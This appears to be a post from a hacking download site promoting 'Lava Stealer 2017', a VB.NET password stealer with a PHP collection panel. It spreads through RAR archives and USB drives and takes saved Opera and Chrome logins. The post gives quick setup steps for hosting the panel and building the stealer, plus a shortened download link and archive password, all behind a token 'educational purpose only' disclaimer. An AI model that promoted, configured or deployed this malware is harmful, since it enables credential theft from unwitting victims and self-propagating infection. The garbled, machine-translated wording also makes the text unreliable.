New Visitor Information

All the file majority uploaded at 4shared.com. You need account 4shared for continue download.
WARNING !!!All Video Tutorial and Information in this website is just for educational purpose only. Used for illegal activity is completely a crime. So Please don't try to do.I do not take any responsibility.

Lava Stealer 2017 rar spreader + TUtor


New project for a new idea although KingdomSc work on a similar project.
It is a project for PHP Page and SteaLer language VB.NET!
The idea is to spread the Stealer biggest way possible and to withdraw Albasordat and send PHP Page!
I wrote a draft of the project from scratch with the exception of Class SqliteHandler for reading files Sqlite!
I thought , and I found that the best way to take advantage of the project is put through and waiting developed by the developers!
Spreads are dependent proliferation in Rar files and USB I wrote it myself :)!
Pull Albasordat currently only Opera - Google because I wanted to end the project as soon as, I began to feel bored!
Thread Of course Knqah If at any problem or suggestion or request or criticism please feel free to ask :)!
Source SteaLer in the bottom of the topic to take advantage of tags!

 regards I M 9


 P/s the best part is spreader HDD and rar spreader .. :)
     the bad part design for opera and google chrome  .. :(

I do some change for your own get client IP. purpose avoid suspicious activity in your own stealer

Quick setup:
- change username and password


- upload all inside Lava.zip into your webhost
-  set your url stealer

- upload getIP.php into your webhost and change the link

- Build






DOWNLOAD LAVA STEALER 2017 + TUTOR
http://adf.ly/1icUG2

password: theatregelap.com